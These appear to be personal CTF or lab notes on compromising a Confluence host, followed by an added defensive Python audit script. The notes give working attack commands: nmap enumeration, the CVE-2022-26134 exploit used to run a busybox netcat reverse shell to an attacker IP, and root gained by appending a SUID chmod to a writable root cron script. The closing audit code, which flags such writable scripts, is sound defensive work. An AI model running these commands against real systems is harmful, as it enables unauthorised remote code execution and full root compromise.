Enum
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p- -oN udp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
Services
22 ssh
8090 confluence
Public exploit
Try at least 4 exploit PoCs before moving on.
➜ CVE-2022-26134 git:(main) python3 CVE-2022-26134.py http://192.168.245.41:8090 whoami
Confluence target version: 7.13.6
confluence
➜ CVE-2022-26134 git:(main)
YOOO
ALWAYS USE BUSYBOX NETCAT
python3 CVE-2022-26134.py http://192.168.245.41:8090 'busybox nc 192.168.45.171 22 -e sh'
Local
881eb6ca6cbaf31eb219c17c23d10ed2
Ran pspy and found a root cron job running a backup script:
2024/08/11 16:41:01 CMD: UID=0 PID=3061 | /usr/sbin/CRON -f -P
2024/08/11 16:41:01 CMD: UID=0 PID=3062 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3063 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3065 | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101
2024/08/11 16:41:01 CMD: UID=0 PID=3066 | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101
2024/08/11 16:41:01 CMD: UID=0 PID=3067 |
2024/08/11 16:41:01 CMD: UID=0 PID=3068 |
2024/08/11 16:41:01 CMD: UID=0 PID=3069 |
2024/08/11 16:41:01 CMD: UID=0 PID=3070 | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ;
2024/08/11 16:41:06 CMD: UID=0 PID=3071 |
The script is writable by our user, so we can echo into it:
echo "chmod +s /bin/bash" >> log-backup.sh
Wait for the next cron run, then exec the SUID bash:
/bin/bash -p
proof:
4b230a2820e2be2549a9d3469cd70b11
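Added audit check (my own example, not part of the original notes): it parses pspy lines like the ones above for scripts that root launches through an interpreter, then reports whether the script or its parent directory is owned by a non-root user or group/world-writable, which is the weakness the cron job above has. The sample log is constructed and the interpreter set is an assumption.

```python
import os
import re
import stat

# Constructed pspy-style sample, modelled on the lines in the notes above.
SAMPLE_PSPY = """\
2024/08/11 16:41:01 CMD: UID=0 PID=3061 | /usr/sbin/CRON -f -P
2024/08/11 16:41:01 CMD: UID=0 PID=3062 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3063 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3067 |
2024/08/11 16:41:05 CMD: UID=1000 PID=3080 | /bin/bash /home/user/own.sh
"""

PSPY_RE = re.compile(r"^\S+ \S+ CMD: UID=(\d+) PID=\d+ \|\s*(.*)$")
INTERPRETERS = {"/bin/bash", "/bin/sh", "bash", "sh", "/usr/bin/python3", "python3"}  # assumed set

def root_scripts(pspy_text):
    """Script paths that UID 0 launched through an interpreter, deduplicated."""
    found = []
    for line in pspy_text.splitlines():
        m = PSPY_RE.match(line)
        if not m or m.group(1) != "0":
            continue
        argv = m.group(2).split()
        if len(argv) >= 2 and argv[0] in INTERPRETERS and argv[1].startswith("/"):
            if argv[1] not in found:
                found.append(argv[1])
    return found

def audit_mode(mode, uid):
    """Findings for a root-run script given its st_mode and owner uid."""
    findings = []
    if uid != 0:
        findings.append("not owned by root (uid %d can edit it)" % uid)
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit_path(path):
    """Check the script and its parent directory (a writable dir lets the file be replaced)."""
    report = {}
    for p in (path, os.path.dirname(path)):
        st = os.stat(p)  # raises FileNotFoundError if the path does not exist on this host
        report[p] = audit_mode(st.st_mode, st.st_uid)
    return report

if __name__ == "__main__":
    for script in root_scripts(SAMPLE_PSPY):
        print(script, audit_path(script) if os.path.exists(script) else "missing on this host")
```

A clean result is an empty findings list for both the script and its directory; the fix for the box above is root ownership and mode 0755 (or stricter) on /opt/log-backup.sh.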